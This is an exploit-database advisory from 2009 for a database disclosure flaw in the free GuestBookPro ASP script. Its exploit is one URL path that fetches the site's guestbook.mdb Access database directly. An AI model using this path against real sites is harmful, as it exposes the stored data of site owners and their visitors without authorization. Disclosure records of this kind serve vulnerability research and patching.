id: 10287
date: 12/16/2009
title: GuestBookPro Script Remote Database Disclosure Vulnerability
author: ViRuSMaN
cves: 

============================================================
GuestBookPro Script Remote Database Disclosure Vulnerability
============================================================

==============================================================================
        [»] ~ Note : Thx 2 Egyptian National Team
==============================================================================
        [»] Free ASP GuestBookPro Script Remote Database Disclosure Vulnerability
==============================================================================
 
    [»] Script:             [ GuestBookPro ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Codefixer GuestBookPro - Free ASP GuestBook Script ]
    [»] Download:           [ http://www.codefixer.com/app_guestbookpro/default.asp ]
    [»] Founder:            [ ViRuSMaN ]
###########################################################################
 
===[ Exploit ]===
 
    [»] http://[target].com/[path]/db/guestbook.mdb
 
 
Author: ViRuSMaN <-





#  0day.today [2023-03-24]  #